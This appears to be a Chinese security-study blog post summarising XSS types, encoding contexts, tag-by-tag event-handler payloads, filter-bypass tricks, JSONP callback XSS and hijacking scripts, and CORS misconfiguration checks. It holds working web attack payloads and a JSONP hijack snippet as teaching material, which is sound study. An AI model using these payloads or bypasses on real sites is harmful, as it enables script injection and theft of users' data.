<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="XSS," />










<meta name="description" content="类型 内容 位置    反射型 服务端不保存数据，输入即时反馈到前端执行 后端   存储型 服务端保存数据，由服务端取出反馈到前端执行 后端   DOM型 取出和执行由前端浏览器端完成 前端   编码对照表   位置 示例 编码方式 编码示例    HTML标签之间 &lt;div&gt;xxoo&lt;&#x2F;div&gt; HTML Entity编码 &amp;amp;   HTML标签属性">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS、同源策略、JSONP、CORS和WebSocket">
<meta property="og:url" content="http://yoursite.com/2020/03/07/XSS%E3%80%81%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5%E3%80%81JSONP%E3%80%81CORS%E5%92%8CWebSocket/index.html">
<meta property="og:site_name" content="zrools">
<meta property="og:description" content="类型 内容 位置    反射型 服务端不保存数据，输入即时反馈到前端执行 后端   存储型 服务端保存数据，由服务端取出反馈到前端执行 后端   DOM型 取出和执行由前端浏览器端完成 前端   编码对照表   位置 示例 编码方式 编码示例    HTML标签之间 &lt;div&gt;xxoo&lt;&#x2F;div&gt; HTML Entity编码 &amp;amp;   HTML标签属性">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2020-03-07T03:18:22.000Z">
<meta property="article:modified_time" content="2020-03-09T05:53:50.000Z">
<meta property="article:author" content="zrools">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/03/07/XSS、同源策略、JSONP、CORS和WebSocket/"/>





  <title>XSS、同源策略、JSONP、CORS和WebSocket | zrools</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zrools</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/07/XSS%E3%80%81%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5%E3%80%81JSONP%E3%80%81CORS%E5%92%8CWebSocket/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zrools">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zrools">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS、同源策略、JSONP、CORS和WebSocket</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-07T11:18:22+08:00">
                2020-03-07
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <table>
<thead>
<tr>
<th>类型</th>
<th>内容</th>
<th>位置</th>
</tr>
</thead>
<tbody><tr>
<td>反射型</td>
<td>服务端不保存数据，输入即时反馈到前端执行</td>
<td>后端</td>
</tr>
<tr>
<td>存储型</td>
<td>服务端保存数据，由服务端取出反馈到前端执行</td>
<td>后端</td>
</tr>
<tr>
<td>DOM型</td>
<td>取出和执行由前端浏览器端完成</td>
<td>前端</td>
</tr>
</tbody></table>
<h3 id="编码对照表"><a href="#编码对照表" class="headerlink" title="编码对照表"></a>编码对照表</h3><table>
<thead>
<tr>
<th>位置</th>
<th align="center">示例</th>
<th align="center">编码方式</th>
<th align="center">编码示例</th>
</tr>
</thead>
<tbody><tr>
<td>HTML标签之间</td>
<td align="center"><code>&lt;div&gt;xxoo&lt;/div&gt;</code></td>
<td align="center">HTML Entity编码</td>
<td align="center"><code>&amp;amp;</code></td>
</tr>
<tr>
<td>HTML标签属性</td>
<td align="center"><code>&lt;img src=&quot;xxoo&quot; /&gt;</code></td>
<td align="center">HTML Attribute编码</td>
<td align="center"><code>&amp;#xHH;</code></td>
</tr>
<tr>
<td>Javascript标签之间</td>
<td align="center"><code>&lt;script&gt;var xss=&quot;xxoo&quot;&lt;/script&gt;</code></td>
<td align="center">Javascript编码</td>
<td align="center"><code>\xHH</code></td>
</tr>
<tr>
<td>HTML标签属性的URL</td>
<td align="center"><code>&lt;a href=&quot;/xss?p=xxoo&quot;&gt;xss&lt;/a&gt;</code></td>
<td align="center">URL编码</td>
<td align="center"><code>%HH</code></td>
</tr>
<tr>
<td>CSS的Style属性</td>
<td align="center"><code>&lt;div style=&quot;width:xxoo;&quot;&gt;xss&lt;/div&gt;</code></td>
<td align="center">CSS编码</td>
<td align="center"><code>\HH</code></td>
</tr>
</tbody></table>
<h3 id="常见标签"><a href="#常见标签" class="headerlink" title="常见标签"></a>常见标签</h3><table>
<thead>
<tr>
<th>类型</th>
<th>内容</th>
</tr>
</thead>
<tbody><tr>
<td><code>&lt;a&gt;</code></td>
<td><code>&lt;a href=&quot;xxx&quot; onmouseover=alert(1)&gt;x&lt;/a&gt;</code>、<code>&lt;a href=&quot;xxx&quot; onclimbatree=alert(1)&gt;x&lt;/a&gt;</code></td>
</tr>
<tr>
<td><code>&lt;script&gt;</code></td>
<td><code>&lt;scirpt&gt;alert(&quot;xss&quot;);&lt;/script&gt;</code></td>
</tr>
<tr>
<td><code>&lt;img&gt;</code></td>
<td><code>&lt;img src=1 onerror=alert(&quot;xss&quot;);&gt;</code></td>
</tr>
<tr>
<td><code>&lt;input&gt;</code></td>
<td><code>&lt;input onfocus=&quot;alert(&#39;xss&#39;);&quot;&gt;</code>、<code>&lt;input onfocus=&quot;alert(&#39;xss&#39;);&quot; autofocus&gt;</code></td>
</tr>
<tr>
<td><code>&lt;details&gt;</code></td>
<td><code>&lt;details ontoggle=&quot;alert(&#39;xss&#39;);&quot;&gt;</code>、<code>&lt;details open ontoggle=&quot;alert(&#39;xss&#39;);&quot;&gt;</code></td>
</tr>
<tr>
<td><code>&lt;svg&gt;</code></td>
<td><code>&lt;svg onload=alert(&quot;xss&quot;);&gt;</code></td>
</tr>
<tr>
<td><code>&lt;select&gt;</code></td>
<td><code>&lt;select onfocus=alert(1)&gt;&lt;/select&gt;</code>、<code>&lt;select onfocus=alert(1) autofocus&gt;</code></td>
</tr>
<tr>
<td><code>&lt;iframe&gt;</code></td>
<td><code>&lt;iframe onload=alert(&quot;xss&quot;);&gt;&lt;/iframe&gt;</code></td>
</tr>
<tr>
<td><code>&lt;video&gt;</code></td>
<td><code>&lt;video&gt;&lt;source onerror=&quot;alert(1)&quot;&gt;</code></td>
</tr>
<tr>
<td><code>&lt;audio&gt;</code></td>
<td><code>&lt;audio src=x  onerror=alert(&quot;xss&quot;);&gt;</code></td>
</tr>
<tr>
<td><code>&lt;body&gt;</code></td>
<td><code>&lt;body onload=alert(&quot;xss&quot;);&gt;</code></td>
</tr>
<tr>
<td><code>&lt;textarea&gt;</code></td>
<td><code>&lt;textarea onfocus=alert(&quot;xss&quot;); autofocus&gt;</code></td>
</tr>
<tr>
<td><code>&lt;keygen&gt;</code></td>
<td><code>&lt;keygen autofocus onfocus=alert(1)&gt;</code> # Firefox</td>
</tr>
<tr>
<td><code>&lt;marquee&gt;</code></td>
<td><code>&lt;marquee onstart=alert(&quot;xss&quot;)&gt;&lt;/marquee&gt;</code> # FireFox、IE</td>
</tr>
<tr>
<td><code>&lt;isindex&gt;</code></td>
<td><code>&lt;isindex type=image src=1 onerror=alert(&quot;xss&quot;)&gt;</code> # IE</td>
</tr>
<tr>
<td><code>&lt;link&gt;</code></td>
<td><code>&lt;link rel=import href=&quot;http://127.0.0.1/1.js&quot;&gt;</code></td>
</tr>
<tr>
<td>javascript伪协议</td>
<td><code>&lt;a href=&quot;javascript:alert(</code>xss<code>);&quot;&gt;xss&lt;/a&gt;</code> <br> <code>&lt;iframe src=javascript:alert(&#39;xss&#39;);&gt;&lt;/iframe&gt;</code> <br> <code>&lt;form action=&quot;Javascript:alert(1)&quot;&gt;&lt;input type=submit&gt;</code></td>
</tr>
</tbody></table>
<h3 id="过滤与绕过"><a href="#过滤与绕过" class="headerlink" title="过滤与绕过"></a>过滤与绕过</h3><table>
<thead>
<tr>
<th>类型</th>
<th>内容</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td>过滤引号</td>
<td><code>&lt;img src=&quot;x&quot; onerror=alert(`xss`);&gt;</code></td>
<td>编码绕过 <br> JS中用反引号 <br> HTML可不用引号</td>
</tr>
<tr>
<td>过滤括号</td>
<td><code>&lt;svg/onload=&quot;window.onerror=eval;throw&#39;=alert\x281\x29&#39;;&quot;&gt;</code></td>
<td>-</td>
</tr>
<tr>
<td>过滤URL</td>
<td><code>&lt;img src=&quot;x&quot; onerror=document.location=`http://%77%77%77%2e.../`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=document.location=`http://2130706433/`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=document.location=`http://0177.0.0.01/`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=document.location=`http://0x7f.0x0.0x0.0x1/`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=document.location=`//www.baidu.com`&gt;</code> <br> <code>&lt;img src=&quot;x&quot; onerror=&quot;document.location=`http://www。baidu。com`&quot;&gt;</code></td>
<td>URL编码 <br> 进制转换 <br> <code>//</code>代替<code>http://</code></td>
</tr>
<tr>
<td>大小写</td>
<td><code>&lt;scRiPt&gt;alert(1);&lt;/scrIPt&gt;</code></td>
<td>-</td>
</tr>
<tr>
<td>过滤标签</td>
<td><code>&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;script&gt;ipt&gt;</code></td>
<td>-</td>
</tr>
</tbody></table>
<h3 id="同源策略"><a href="#同源策略" class="headerlink" title="同源策略"></a>同源策略</h3><p>同源策略（Same origin policy）是一种约定，同协议、同端口、同主机（域名），目的是为了保证用户信息的安全，防止恶意的网站窃取数据。</p>
<ul>
<li>限制范围</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Cookie、LocalStorage 和 IndexDB 无法读取。</span><br><span class="line"></span><br><span class="line">DOM 无法获得。</span><br><span class="line"></span><br><span class="line">AJAX 请求不能发送。</span><br></pre></td></tr></table></figure>

<ul>
<li>修改源</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">document.domain &#x3D; &quot;test.com&quot;</span><br></pre></td></tr></table></figure>

<h3 id="JSONP"><a href="#JSONP" class="headerlink" title="JSONP"></a>JSONP</h3><p>JSONP(JSON with Padding)是实现跨域的一种技术，可以跨域读取数据。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$.getJSON(&quot;https:&#x2F;&#x2F;www.xxx.com&#x2F;jsonp.php?jsoncallback&#x3D;?&quot;, function(data) &#123;</span><br><span class="line"></span><br><span class="line">   do something...</span><br><span class="line"></span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<ul>
<li>callback XSS</li>
</ul>
<p>当服务器自定义<code>callback</code>，未定义<code>Content-Type</code>头，且这样写时会导致XSS：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    $callback &#x3D; $_REQUEST[&#39;callback&#39;];</span><br><span class="line"></span><br><span class="line">    $data &#x3D; array(</span><br><span class="line">        ...</span><br><span class="line">    );</span><br><span class="line"></span><br><span class="line">    echo $callback . &quot;(&quot; . json_encode($data) . &quot;)&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><code>Content-Type</code>值：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">text&#x2F;json</span><br><span class="line">application&#x2F;json</span><br><span class="line">text&#x2F;javascript</span><br><span class="line">application&#x2F;javascript</span><br></pre></td></tr></table></figure>

<ul>
<li>JSNOP劫持</li>
</ul>
<p>类似CRSF，区别在于JSONP劫持可以回传数据到指定地址，当服务器未做严格的来源校验时，会导致劫持敏感信息，攻击脚本可以这样写：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type&#x3D;&quot;text&#x2F;javascript&quot;&gt;</span><br><span class="line">    function attack(data)&#123;</span><br><span class="line">        console.log(data);  &#x2F;&#x2F; 可以替换写入恶意脚本，发送数据</span><br><span class="line">    &#125;</span><br><span class="line">&lt;&#x2F;script&gt;</span><br><span class="line"></span><br><span class="line">&lt;script src&#x3D;&quot;https:&#x2F;&#x2F;xxx.com&#x2F;jsonp.php?callback&#x3D;attack&quot;&gt;&lt;&#x2F;script&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>空Referer</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">1. iframe的src javascript伪协议</span><br><span class="line"></span><br><span class="line">&lt;iframe src&#x3D;&quot;javascript:&#39;&lt;script&gt; ... &lt;&#x2F;script&gt;&#39;&quot;&gt;&lt;&#x2F;iframe&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">2. meta标签</span><br><span class="line"></span><br><span class="line">&lt;meta name&#x3D;&quot;referrer&quot; content&#x3D;&quot;never&quot;&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">3. HTTPS向HTTP请求</span><br></pre></td></tr></table></figure>


<h3 id="WebSocket"><a href="#WebSocket" class="headerlink" title="WebSocket"></a>WebSocket</h3><p>WebSocket 是 HTML5 开始提供的一种在单个 TCP 连接上进行全双工通讯的协议，允许服务端主动向客户端推送数据。</p>
<ul>
<li>ws://（非加密）和wss://（加密）；</li>
<li>建立在 TCP 协议之上；</li>
<li>数据轻量化；</li>
<li>可发送文本和二进制数据；</li>
<li>没有同源策略限制。</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">var Socket &#x3D; new WebSocket(url, [protocol] );</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.runoob.com&#x2F;html&#x2F;html5-websocket.html</span><br></pre></td></tr></table></figure>


<h3 id="CORS"><a href="#CORS" class="headerlink" title="CORS"></a>CORS</h3><p>跨域资源共享(CORS) 是一种机制，通过定义额外的HTTP头来使浏览器能够允许不同源之间的资源交互。</p>
<ul>
<li>请求</li>
</ul>
<table>
<thead>
<tr>
<th>类型</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td>Origin：<code>&lt;origin&gt;</code></td>
<td>表示实际请求的源站</td>
</tr>
<tr>
<td>Access-Control-Request-Method: <code>&lt;method&gt;</code></td>
<td>用于预检请求，表示真实的请求方法</td>
</tr>
<tr>
<td>Access-Control-Request-Headers: <code>&lt;field-name&gt;[, &lt;field-name&gt;]*</code></td>
<td>用于预检请求，表示真实请求所携带的首部字段</td>
</tr>
</tbody></table>
<ul>
<li>响应</li>
</ul>
<table>
<thead>
<tr>
<th>类型</th>
<th>备注</th>
</tr>
</thead>
<tbody><tr>
<td>Access-Control-Allow-Origin: `<origin></td>
<td>*`</td>
</tr>
<tr>
<td>Access-Control-Allow-Credentials：false</td>
<td>是否允许浏览器读取Response内容（如Cookie）</td>
</tr>
<tr>
<td>Access-Control-Allow-Methods</td>
<td>用于预检请求响应，表示允许使用的HTTP方法</td>
</tr>
<tr>
<td>Access-Control-Allow-Headers</td>
<td>用于预检请求响应，表示允许携带的头部</td>
</tr>
<tr>
<td>Access-Control-Expose-Headers</td>
<td>允许响应时能获取的其他头部</td>
</tr>
<tr>
<td>Access-Control-Max-Age</td>
<td>Preflight请求的最大响应时间</td>
</tr>
</tbody></table>
<ul>
<li>CORS漏洞</li>
</ul>
<p>检测方式通常是修改<code>Origin</code>头字段值，看<code>Access-Control-Allow-Origin</code>返回的结果。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl https:&#x2F;&#x2F;www.abc.com -H &quot;Origin: https:&#x2F;&#x2F;test.com&quot; -I</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1. 发送origin&#x3D;NULL</span><br><span class="line"></span><br><span class="line">&lt;iframe sandbox&#x3D;&quot;allow-scripts allow-top-navigation allow-forms&quot; src&#x3D;&#39;data:text&#x2F;html,&lt;script&gt; ... &lt;&#x2F;script&gt;&#39;&gt;&lt;&#x2F;iframe&gt;</span><br><span class="line"></span><br><span class="line">2. 域名校验不严格</span><br><span class="line"></span><br><span class="line">aa.com -&gt; aa.com.cn</span><br><span class="line"></span><br><span class="line">3 ...</span><br></pre></td></tr></table></figure>

<h3 id="参见"><a href="#参见" class="headerlink" title="参见"></a>参见</h3><ul>
<li><a href="https://xz.aliyun.com/t/4067" target="_blank" rel="noopener">https://xz.aliyun.com/t/4067</a></li>
<li><a href="https://www.freebuf.com/articles/web/195925.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/195925.html</a></li>
<li><a href="https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Access_control_CORS" target="_blank" rel="noopener">https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Access_control_CORS</a></li>
</ul>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/XSS/" rel="tag"># XSS</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/05/PHP-%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%B0%8F%E7%BB%93/" rel="next" title="PHP 文件包含小结">
                <i class="fa fa-chevron-left"></i> PHP 文件包含小结
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/09/VulnStack-ATT-CK%E7%BA%A2%E9%98%9F%E8%AF%84%E4%BC%B0%E5%AE%9E%E6%88%98-%E4%B8%80-Writeup/" rel="prev" title="VulnStack - ATT&CK红队评估实战(一) Writeup">
                VulnStack - ATT&CK红队评估实战(一) Writeup <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">zrools</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">9</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#编码对照表"><span class="nav-number">1.</span> <span class="nav-text">编码对照表</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#常见标签"><span class="nav-number">2.</span> <span class="nav-text">常见标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#过滤与绕过"><span class="nav-number">3.</span> <span class="nav-text">过滤与绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#同源策略"><span class="nav-number">4.</span> <span class="nav-text">同源策略</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#JSONP"><span class="nav-number">5.</span> <span class="nav-text">JSONP</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#WebSocket"><span class="nav-number">6.</span> <span class="nav-text">WebSocket</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CORS"><span class="nav-number">7.</span> <span class="nav-text">CORS</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参见"><span class="nav-number">8.</span> <span class="nav-text">参见</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zrools</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
